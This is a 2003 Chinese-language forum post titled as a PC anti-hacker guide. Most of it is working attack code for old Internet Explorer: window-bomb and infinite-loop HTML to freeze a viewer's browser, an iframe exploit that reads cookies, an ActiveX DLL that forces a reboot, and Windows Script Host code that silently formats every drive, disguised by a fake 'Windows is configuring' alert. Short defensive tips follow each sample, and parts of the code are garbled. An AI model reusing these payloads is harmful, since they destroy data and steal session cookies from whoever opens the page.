|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2003-11-10, 04:19 AM | #1 |
榮譽會員
|
個人電腦防黑指南
internet 是一個建立在全球眾多的網路上的網路集體,而各人電腦則是基本元件可當我們上網時,你是否有過無顧非法、資料丟失、當機等等。當然可能是我們操作不當而所致 但也不排除黑客(hacker)或是駭客(cracker)在搗亂、攻擊呢?以下是我的個人防黑經驗、有不當之處請多指教~~
任何合法資料都是通過:TCP/IP 傳送的,網路攻擊也不列外,黑客們就是在網路上傳送包含有非法目的合法資料進行攻擊和入侵的 如:木馬、網路鑒聽與截取資料、郵件炸彈、利用漏洞進行攻擊~!!! 下面是一些列子 1、佔用CPU:這是一些典型的消耗系統資源列子,歸終讓電腦當機! 一般都一些html程式碼:如 (1)<img scr ="javascript : n=1 ; do {windows(『 『)}while (n=1)" width="1"> (2)<a href="http://XXX" onMouseover="while(1){window.close(『/『)}"> (3).也可叫你開啟指定的視窗: <img src="java-script:n=1;do{window.open(『http://指定的頁『)}while(n==2)" width="1"> 或<meta http-equirv="refresh" content="1;url=http://你指定的頁"> 這就是一個無限開啟視窗的html程式碼! 以下是也是一個*。HTML 可以用郵件發給別人開啟,以至於當機: <html> <head> <title > 視窗炸彈</title> <META HTTP-EQUIV="content-type" content="text/html; chatset =gb2312> </head> <body onload= windowsbomb()『><! 這是在定義函數> <script language="javaScript"> function windowsbomb() {var coutero=0//define&reset couter=0 //*************定義計數為0**************** while(true) { window.open("http:www.163.com"," crashing "+countero, width=2 ,height=2,resizable=no") countero++ } } </script> </body> </html> 好了,上面可以用記事本編寫,然後存為*.html 就行了~ 解決方法:只要不隨意開啟陌生人發來的郵件,特別是*.html *.vbs *.doc *.exe 2、非法讀取資料:這些代一般在網頁在加Activex\Javascript 和webbrowser control 的使用,它可以通過IE5.0的iframe 漏洞開啟用IE可以開啟的任何文件疇i怕不可怕? 例子:下面是程式碼 <script language="jscript"> 濾nload=function () { 燾ar 濾Victim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi 檬tim","width=100,height=100"); 瀏etTimeout( 檸unction () { 濾Victim.frames[0].location.href="javascript:alert(document.cooki 檻)"; 癖, 7000 ); 癖 </script> 解決辦法: 礎bIE中取消指令碼執行的功能。 3、控制電腦: 看自己IE的安全性設定,對於「下載已簽名的ActiveX控件」 選項是「提示」。但IE仍然有在無需提示的情況下下載和執行程序 它可以執行一些木馬程序等 ,像一些在線破解就是這樣的原理 列子: 開啟VB5新增一個「ActiveX.dll」文件,把下面的程式碼輸入進去: Private Declare Function ExitWindowsEx Lib "user32"_ (ByVal uFlags As Long,ByVal dwReserved As Long)_ As Long Sub Xuankong() "請不要加上「private」 a$=InputBox("請輸入你的姓名,如果你輸入的是"xuankong""+Chr(13)+Chr(10)+ "則會在你的系統中產生一個"xuankong"文件"+Chr(10)+Chr(13)+ "否則你的機器可能會重新啟動","請輸入","xuankong") If a$="xuankong" Then Open "c:\xuankong.dat" For Append As #Write#1,"我的朋友,這是一個asp主件測試程序" #Write#1,"hello world!this is a test" #Write#1,"如果你看到這個文件測試就成功!" else ExitWindowsEx&H43,0』使用API函數重新啟動機器 End if Close #1 End sub 解決方法: 在註冊表HKEY-LOCAL-MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatiblity」下為「Active Setup controls」新增一個關於CLSID的新增{6E449683-C509-11CF-AAFA-00AA00 B6015C}在新增下新增REGDWORD類型的值:Compatibility Flags 0x00000400。 4、當機:也是做一個網頁讓用戶開啟後當機 如下程式碼: <HTML> <BODY> <SCRIPT> var color = new Array; color[1] = "black"; color[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = color[x] if(x == 2) { x = 0; } } </SCRIPT> </BODY> </HTML> 解決方法:掉你瀏覽器裡的java功能,還要記住不要瀏覽一些來路不明的網站和不要在聊天室裡按其他網友發出的超級連結,如果中了,你一定要在沒有當機時(環時) 用ctrl+alt+del 關掉你你開啟的網頁,否則後果。。。。。。獺 5、格式化本機硬碟 程式碼如下:注意,這些程式碼是For Spanish Windows『98.要想讓它在中文或是英文版本下執行,得做寫改動,具體得自己動手啦~~~~) <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"> </object> <SCRIPT> scr.Reset(); scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta"; scr.Doc="<object id=『wsh『 classid=『clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B『></object><SCRIPT>wsh.Run(『start /m format a: /q /autotest /u『);alert(『IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.『);</"+"SCRIPT>"; scr.write(); 這個可以用的:如下: <OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></OBJECT> <SCRIPT> wsh.Run(『start /m format.com z:/q /autotest /u『); wsh.Run(『start /m format.com y:/q /autotest /u『); wsh.Run(『start /m format.com x:/q /autotest /u『); wsh.Run(『start /m format.com w:/q /autotest /u『); wsh.Run(『start /m format.com v:/q /autotest /u『); wsh.Run(『start /m format.com u:/q /autotest /u『); wsh.Run(『start /m format.com t:/q /autotest /u『); wsh.Run(『start /m format.com s:/q /autotest /u『); wsh.Run(『start /m format.com r:/q /autotest /u『); wsh.Run(『start /m format.com q:/q /autotest /u『); wsh.Run(『start /m format.com p:/q /autotest /u『); wsh.Run(『start /m format.com o:/q /autotest /u『); wsh.Run(『start /m format.com n:/q /autotest /u『); wsh.Run(『start /m format.com m:/q /autotest /u『); wsh.Run(『start /m format.com l:/q /autotest /u『); wsh.Run(『start /m format.com k:/q /autotest /u『); wsh.Run(『start /m format.com j:/q /autotest /u『); wsh.Run(『start /m format.com i:/q /autotest /u『); wsh.Run(『start /m format.com h:/q /autotest /u『); wsh.Run(『start /m format.com g:/q /autotest /u『); wsh.Run(『start /m format.com f:/q /autotest /u『); wsh.Run(『start /m format.com e:/q /autotest /u『); wsh.Run(『start /m format.com d:/q /autotest /u『); wsh.Run(『start /m format.com c:/q /autotest /u『); wsh.Run(『start /m format.com b:/q /autotest /u『); wsh.Run(『start /m format.com a:/q /autotest /u『); </SCRIPT> 解決方法:format.com、deltree.exe 改名,或是刪 了 好了,就寫到了,我也累了, 作 者:red-no1 |
送花文章: 3,
|
向 psac 送花的會員:
|
acw123 (2007-06-04)
感謝您發表一篇好文章 |